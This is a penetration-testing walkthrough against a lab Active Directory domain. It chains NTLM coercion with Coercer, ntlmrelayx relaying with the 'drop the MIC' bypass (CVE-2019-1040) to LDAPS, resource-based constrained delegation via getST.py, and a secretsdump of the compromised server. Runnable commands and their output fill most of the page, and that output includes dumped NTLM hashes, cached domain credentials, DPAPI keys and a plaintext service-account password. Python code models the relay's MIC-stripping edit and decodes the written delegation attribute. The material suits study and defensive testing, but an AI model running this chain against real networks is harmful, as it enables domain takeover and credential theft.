Attacking Active Directory

Coerced auth smb + ntlmrelayx to ldaps with drop the mic


Last updated 2 years ago

We can coerce the Salisbury server into authenticating to our host using several methods (PetitPotam, PrinterBug, DFSCoerce). To trigger the coercion without choosing between them, we can use Coercer, the all-in-one tool that just came out. The coerced SMB authentication is then relayed with ntlmrelayx to the LDAPS service of the Baltimore DC.

As explained in the hackndo blog (en.hackndo.com/ntlm-relay) and in The Hacker Recipes (www.thehacker.recipes/ad/movement/ntlm/relay), an SMB authentication cannot be relayed to LDAP or LDAPS as-is: SMB clients set the NTLMSSP_NEGOTIATE_SIGN flag in their NTLM messages, so the DC then expects the LDAP session to be signed, which the relay cannot do without the session key. CVE-2019-1040, a.k.a. "drop the MIC" or remove-mic, is the bypass: the relay clears the signing flags and removes the MIC (message integrity code) that would otherwise reveal the change. This only works against a DC that is missing the June 2019 patch (a patched DC checks the MsvAvFlags inside the NTLMv2 response and rejects an authentication whose MIC is missing) and that does not enforce LDAP channel binding on LDAPS. LDAPS rather than LDAP is targeted because creating a computer account with a password (--add-computer) requires an encrypted connection.

  • Start the relay with --remove-mic against the LDAPS service of baltimore.maryland.local (the DC).

  • Run the coerced authentication against Salisbury. Salisbury is an up-to-date Windows Server 2016, so unauthenticated PetitPotam will not work here; Coercer is run with a low-privileged domain account instead.
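The two relay-side edits described above (clear the signing flags, cut the MIC) and the DC-side check the 2019 patch introduced, as an added example in Python; this is not code from the page, from Impacket or from Coercer. The NTLMv2 AUTHENTICATE (type 3) message is built by hand from constructed bytes (no real HMACs are computed), the layouts and flag values follow MS-NLMP, the user/domain names are the ones from the relay output above, and ldap_session_usable is a simplified model of the DC's decision, not an emulation of LSASS. ntlmrelayx applies the same flag stripping to the NEGOTIATE (type 1) message; only the type 3 handling is shown here:

```python
import struct

# NegotiateFlags bits (MS-NLMP 2.2.2.5)
NTLMSSP_NEGOTIATE_UNICODE = 0x00000001
NTLMSSP_NEGOTIATE_SIGN = 0x00000010
NTLMSSP_NEGOTIATE_ALWAYS_SIGN = 0x00008000
NTLMSSP_NEGOTIATE_VERSION = 0x02000000
NTLMSSP_NEGOTIATE_KEY_EXCH = 0x40000000
SIGNING_FLAGS = NTLMSSP_NEGOTIATE_SIGN | NTLMSSP_NEGOTIATE_ALWAYS_SIGN | NTLMSSP_NEGOTIATE_KEY_EXCH
# Flags an SMB client sends (constructed set; SIGN and ALWAYS_SIGN are the ones that matter)
CLIENT_FLAGS = (NTLMSSP_NEGOTIATE_UNICODE | NTLMSSP_NEGOTIATE_SIGN | NTLMSSP_NEGOTIATE_ALWAYS_SIGN
                | NTLMSSP_NEGOTIATE_VERSION | NTLMSSP_NEGOTIATE_KEY_EXCH)
SIGNATURE = b"NTLMSSP\x00"
MSV_AV_EOL, MSV_AV_FLAGS = 0x0000, 0x0006
MSV_AV_FLAG_MIC_PRESENT = 0x00000002      # AvFlags bit: "this AUTHENTICATE carries a MIC"


def build_authenticate(flags, mic_present, user="SALISBURY$", domain="MARYLAND"):
    """Type 3: 64-byte header, 8-byte Version, 16-byte MIC, payload from offset 88."""
    av_pairs = (struct.pack("<HHI", MSV_AV_FLAGS, 4, MSV_AV_FLAG_MIC_PRESENT if mic_present else 0)
                + struct.pack("<HH", MSV_AV_EOL, 0))          # MsvAvFlags, MsvAvEOL
    nt_response = (b"\x11" * 16                                # NTProofStr (constructed; covers the AV pairs)
                   + b"\x01\x01" + b"\x00" * 6                 # RespType, HiRespType, Reserved1/2
                   + b"\x00" * 8 + b"\x22" * 8 + b"\x00" * 4   # TimeStamp, ChallengeFromClient, Reserved3
                   + av_pairs)
    # LmChallengeResponse, NtChallengeResponse, DomainName, UserName, Workstation, EncryptedRandomSessionKey
    fields = [b"\x00" * 24, nt_response, domain.encode("utf-16-le"), user.encode("utf-16-le"), b"", b""]
    version = struct.pack("<BBHBBBB", 10, 0, 19041, 0, 0, 0, 15)   # constructed Version field
    mic = b"\x33" * 16                                             # constructed MIC
    header, payload = SIGNATURE + struct.pack("<I", 3), b""
    for f in fields:
        header += struct.pack("<HHI", len(f), len(f), 88 + len(payload))
        payload += f
    return header + struct.pack("<I", flags) + version + mic + payload


def parse_authenticate(type3):
    """(flags, fields, version_len, has_mic, nt_response); MIC presence is inferred from the payload offset."""
    assert type3[:8] == SIGNATURE and struct.unpack_from("<I", type3, 8)[0] == 3
    fields = [struct.unpack_from("<HHI", type3, 12 + 8 * i) for i in range(6)]
    flags = struct.unpack_from("<I", type3, 60)[0]
    version_len = 8 if flags & NTLMSSP_NEGOTIATE_VERSION else 0
    has_mic = min(off for _, _, off in fields) >= 64 + version_len + 16
    nt_len, _, nt_off = fields[1]
    return flags, fields, version_len, has_mic, type3[nt_off:nt_off + nt_len]


def nt_response_av_flags(nt_response):
    """Walk the AV pairs after the 16-byte NTProofStr and 28-byte client challenge header."""
    pos = 44
    while pos + 4 <= len(nt_response):
        av_id, av_len = struct.unpack_from("<HH", nt_response, pos)
        if av_id == MSV_AV_EOL:
            break
        if av_id == MSV_AV_FLAGS:
            return struct.unpack_from("<I", nt_response, pos + 4)[0]
        pos += 4 + av_len
    return 0


def drop_the_mic(type3):
    """Relay edit on the type 3: clear SIGN/ALWAYS_SIGN/KEY_EXCH/VERSION, cut Version and MIC,
    shift the payload offsets.  The HMAC-protected NTLMv2 response is left as it is."""
    flags, fields, version_len, has_mic, _ = parse_authenticate(type3)
    cut = version_len + (16 if has_mic else 0)
    header = SIGNATURE + struct.pack("<I", 3)
    for length, maxlen, off in fields:
        header += struct.pack("<HHI", length, maxlen, off - cut)
    header += struct.pack("<I", flags & ~(SIGNING_FLAGS | NTLMSSP_NEGOTIATE_VERSION))
    return header + type3[64 + cut:]


def ldap_session_usable(type3, dc_patched):
    """Simplified DC decision: signing negotiated -> DC wants signed LDAP and the relay has no session key;
    patched DC -> the AV flags promise a MIC but none is present, so the message was tampered with."""
    flags, _, _, has_mic, nt_response = parse_authenticate(type3)
    if flags & (NTLMSSP_NEGOTIATE_SIGN | NTLMSSP_NEGOTIATE_ALWAYS_SIGN):
        return False
    if dc_patched and (nt_response_av_flags(nt_response) & MSV_AV_FLAG_MIC_PRESENT) and not has_mic:
        return False
    return True


def demo():
    original = build_authenticate(CLIENT_FLAGS, mic_present=True)
    relayed = drop_the_mic(original)
    return {"smb_auth_as_is": ldap_session_usable(original, dc_patched=False),
            "drop_the_mic_unpatched_dc": ldap_session_usable(relayed, dc_patched=False),
            "drop_the_mic_patched_dc": ldap_session_usable(relayed, dc_patched=True)}


if __name__ == "__main__":
    print(demo())
```

demo() shows the three outcomes that matter for this page: the unmodified SMB authentication is useless against LDAP because signing was negotiated, the stripped message is accepted by an unpatched DC, and a patched DC rejects the same message because the HMAC-protected AV pairs still claim a MIC that the relay cannot re-add.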

Installation

You can now install Coercer from PyPI with this command (the run below pulled version 2.4):

sudo python3 -m pip install coercer

Collecting coercer
  Downloading coercer-2.4-py3-none-any.whl (49 kB)
     ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 49.1/49.1 kB 136.3 kB/s eta 0:00:00
Requirement already satisfied: xlsxwriter in /usr/lib/python3/dist-packages (from coercer) (3.0.2)
Requirement already satisfied: impacket in /usr/lib/python3/dist-packages (from coercer) (0.10.0)
Requirement already satisfied: jinja2 in /usr/lib/python3/dist-packages (from coercer) (3.0.3)
Requirement already satisfied: dsinternals in /usr/lib/python3/dist-packages (from impacket->coercer) (1.2.4)
Installing collected packages: coercer
Successfully installed coercer-2.4
 
Start the Relay

  • Start ntlmrelayx against the LDAPS service of baltimore.maryland.local with --remove-mic. --add-computer creates a new machine account (removemiccomputer$, with a random password) and --delegate-access writes that account into msDS-AllowedToActOnBehalfOfOtherIdentity of the relayed computer, i.e. resource-based constrained delegation (RBCD) to the coerced host:

sudo ntlmrelayx.py -t ldaps://baltimore.maryland.local -smb2support --remove-mic --add-computer removemiccomputer --delegate-access

  • Output once the coerced authentication from Salisbury (192.168.56.23) comes in:

[*] Servers started, waiting for connections
[*] SMBD-Thread-5: Received connection from 192.168.56.23, attacking target ldaps://baltimore.maryland.local
[*] Authenticating against ldaps://baltimore.maryland.local as MARYLAND/SALISBURY$ SUCCEED
[*] Enumerating relayed user's privileges. This may take a while on large domains
[*] SMBD-Thread-7: Connection from 192.168.56.23 controlled, but there are no more targets left!
[*] Attempting to create computer in: CN=Computers,DC=maryland,DC=local
[*] Adding new computer with username: removemiccomputer$ and password: *mHcnugW1<KF8Oq result: OK
[*] Delegation rights modified succesfully!
[*] removemiccomputer$ can now impersonate users on SALISBURY$ via S4U2Proxy

Let's coerce

  • From a second shell, run Coercer with the low-privileged domain account to force Salisbury to authenticate to our listener (-l is the attacker IP where ntlmrelayx listens):

coercer coerce -u joaquin.Pereida -d maryland.local -p horse -t salisbury.maryland.local -l 192.168.56.31

  • The attack worked: removemiccomputer$ can now impersonate users on SALISBURY$ via S4U2Proxy (RBCD). Use getST.py, authenticating as the new machine account, to request a service ticket for the Salisbury host as Administrator (S4U2Self, then S4U2Proxy). Any SPN of that host works (HOST/ or CIFS/), since both are encrypted with the SALISBURY$ account key; the impersonated account must not be a member of Protected Users nor flagged "account is sensitive and cannot be delegated":

sudo getST.py -spn HOST/salisbury.maryland.local -impersonate Administrator -dc-ip 192.168.56.12 'MARYLAND.LOCAL/removemiccomputer$:*mHcnugW1<KF8Oq'
Impacket v0.10.1.dev1+20230216.13520.d4c06e7f - Copyright 2022 Fortra

[-] CCache file is not found. Skipping...
[*] Getting TGT for user
[*] Impersonating Administrator
[*]     Requesting S4U2self
[*]     Requesting S4U2Proxy
[*] Saving ticket in Administrator.ccache
  • Then use that ticket to dump the SAM database and LSA secrets of the Salisbury server with secretsdump.py:

export KRB5CCNAME=/workspace/Administrator.ccache
secretsdump.py -k -no-pass 'MARYLAND.LOCAL/Administrator@salisbury.maryland.local'

Impacket v0.10.1.dev1+20230216.13520.d4c06e7f - Copyright 2022 Fortra

[*] Service RemoteRegistry is in stopped state
[*] Starting service RemoteRegistry
[*] Target system bootKey: 0x3e6d1ece16a534e660a94480bd6f2a32
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:84fe45d7c3263065e931761aef6c7aaf:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
vagrant:1000:aad3b435b51404eeaad3b435b51404ee:e02bc503339d51f71d913c245d35b50b:::
[*] Dumping cached domain logon information (domain/username:hash)
MARYLAND.LOCAL/sql_svc:$DCC2$10240#sql_svc#89e701ebbd305e4f5380c5150494584a
MARYLAND.LOCAL/joaquin.Pereida:$DCC2$10240#joaquin.Pereida#39dfbbbb2ff73c019c37498e96708c37
[*] Dumping LSA Secrets
[*] $MACHINE.ACC 
maryland\SALISBURY$:plain_password_hex:2100480079004f0060003800600078002b006300270058003e0056004f003c003c004a005100520039005e007a0043005b004d0038005000390073004b00780057003e004800300026004c003b0040004300330055003b00450045006900260046006400700031004c002e00450028002300290045006e0074003d005f005500550051002300760073004a0031002b0078004c0055002100500043004f005b00380072006b005a002d0055002000230032005e004d005a006a006900470044002e0066003c003a0040004b00310079002f0075002e0078005a0063002a002f00690052006f0034003800700041003800
maryland\SALISBURY$:aad3b435b51404eeaad3b435b51404ee:12df918c6cba0ab538b68f10071a1fa5:::
[*] DPAPI_SYSTEM 
dpapi_machinekey:0x0810ead1cae293ee405b7051a9d3a3a3b8afbc0b
dpapi_userkey:0x39f7f79d4d6d8889ba4f1c5bf55a42429702eded
[*] NL$KM 
 0000   26 72 00 BB 64 CB DD D7  34 20 B4 AC 7E 9A 99 05   &r..d...4 ..~...
 0010   75 95 40 EF C7 ED 72 3E  F4 66 93 E7 3D C9 B8 56   u.@...r>.f..=..V
 0020   EC E8 6E 4E 40 13 86 34  A8 F6 E6 36 C6 71 9F 7A   ..nN@..4...6.q.z
 0030   8F 63 A3 23 D9 37 A0 BC  07 C0 0B 06 41 21 5E 64   .c.#.7......A!^d
NL$KM:267200bb64cbddd73420b4ac7e9a9905759540efc7ed723ef46693e73dc9b856ece86e4e40138634a8f6e636c6719f7a8f63a323d937a0bc07c00b0641215e64
[*] _SC_MSSQL$SQLEXPRESS 
maryland.local\sql_svc:YouWillNotKerboroast1ngMeeeeee
[*] Cleaning up... 
[*] Stopping service RemoteRegistry
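To check what the relay actually wrote into msDS-AllowedToActOnBehalfOfOtherIdentity on SALISBURY$ (the "Delegation rights modified" step above), and to know what to remove when cleaning up, here is an added Python example that builds and decodes that security descriptor; it is not code from the page or from Impacket. Byte layouts follow MS-DTYP (self-relative SECURITY_DESCRIPTOR, ACL, ACCESS_ALLOWED_ACE, SID), the SID used for removemiccomputer$ is constructed, and the access mask 0x000F01FF (983551) and BUILTIN\Administrators owner are the values Impacket's ldapattack uses when it creates the descriptor:

```python
import base64
import struct

SE_DACL_PRESENT = 0x0004
SE_SELF_RELATIVE = 0x8000
ACL_REVISION = 2
ACCESS_ALLOWED_ACE_TYPE = 0x00
RBCD_ACE_MASK = 0x000F01FF            # "full control" mask written by ntlmrelayx --delegate-access
BUILTIN_ADMINISTRATORS = "S-1-5-32-544"


def sid_to_bytes(sid):
    """'S-1-5-21-a-b-c-rid' -> Revision, SubAuthorityCount, 48-bit big-endian authority, LE sub-authorities."""
    parts = sid.split("-")
    assert parts[0] == "S" and len(parts) >= 3
    subs = [int(x) for x in parts[3:]]
    return (struct.pack("<BB", int(parts[1]), len(subs)) + int(parts[2]).to_bytes(6, "big")
            + b"".join(struct.pack("<I", s) for s in subs))


def bytes_to_sid(data, pos=0):
    """Inverse of sid_to_bytes; returns (sid, position right after the SID)."""
    revision, count = struct.unpack_from("<BB", data, pos)
    authority = int.from_bytes(data[pos + 2:pos + 8], "big")
    subs = struct.unpack_from("<%dI" % count, data, pos + 8)
    return "S-%d-%d-%s" % (revision, authority, "-".join(map(str, subs))), pos + 8 + 4 * count


def build_rbcd_sd(allowed_sids, owner_sid=BUILTIN_ADMINISTRATORS):
    """One ACCESS_ALLOWED_ACE per SID in a DACL; owner and group both set to owner_sid, no SACL."""
    aces = b""
    for sid in allowed_sids:
        sid_bytes = sid_to_bytes(sid)
        aces += struct.pack("<BBHI", ACCESS_ALLOWED_ACE_TYPE, 0, 8 + len(sid_bytes), RBCD_ACE_MASK) + sid_bytes
    dacl = struct.pack("<BBHHH", ACL_REVISION, 0, 8 + len(aces), len(allowed_sids), 0) + aces
    owner = sid_to_bytes(owner_sid)
    owner_off = 20                          # right after the 20-byte SD header
    group_off = owner_off + len(owner)
    dacl_off = group_off + len(owner)
    header = struct.pack("<BBHIIII", 1, 0, SE_SELF_RELATIVE | SE_DACL_PRESENT,
                         owner_off, group_off, 0, dacl_off)
    return header + owner + owner + dacl


def rbcd_allowed_sids(sd):
    """[(sid, mask)] for each ACCESS_ALLOWED_ACE: the principals allowed to S4U2Proxy to this host."""
    revision, _, control, _, _, _, dacl_off = struct.unpack_from("<BBHIIII", sd, 0)
    if revision != 1 or not control & SE_DACL_PRESENT or dacl_off == 0:
        raise ValueError("no DACL in security descriptor")
    _, _, _, ace_count, _ = struct.unpack_from("<BBHHH", sd, dacl_off)
    pos, out = dacl_off + 8, []
    for _ in range(ace_count):
        ace_type, _, ace_size, mask = struct.unpack_from("<BBHI", sd, pos)
        if ace_type == ACCESS_ALLOWED_ACE_TYPE:
            out.append((bytes_to_sid(sd, pos + 8)[0], mask))
        pos += ace_size
    return out


def sd_to_ldap_value(sd):
    """The base64 form ldapsearch prints for binary attributes (after 'attribute::')."""
    return base64.b64encode(sd).decode()


def rbcd_from_ldapsearch(b64_value):
    """Decode the base64 attribute value copied from ldapsearch output and list the SIDs."""
    return rbcd_allowed_sids(base64.b64decode(b64_value))


if __name__ == "__main__":
    fake_sid = "S-1-5-21-1111111111-2222222222-3333333333-1105"   # constructed SID for removemiccomputer$
    sd = build_rbcd_sd([fake_sid])
    print("msDS-AllowedToActOnBehalfOfOtherIdentity:: " + sd_to_ldap_value(sd))
    for sid, mask in rbcd_from_ldapsearch(sd_to_ldap_value(sd)):
        print("%s may impersonate users to this host (mask 0x%08X)" % (sid, mask))
```

Fetch the attribute with an authenticated ldapsearch on the SALISBURY$ object; it is printed base64-encoded after msDS-AllowedToActOnBehalfOfOtherIdentity::, which rbcd_from_ldapsearch takes directly. Clearing that attribute and deleting removemiccomputer$ are the cleanup steps for this attack.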
References
  • Coercer (the all-in-one coercion tool, installable from PyPI)
  • https://en.hackndo.com/ntlm-relay
  • https://www.thehacker.recipes/ad/movement/ntlm/relay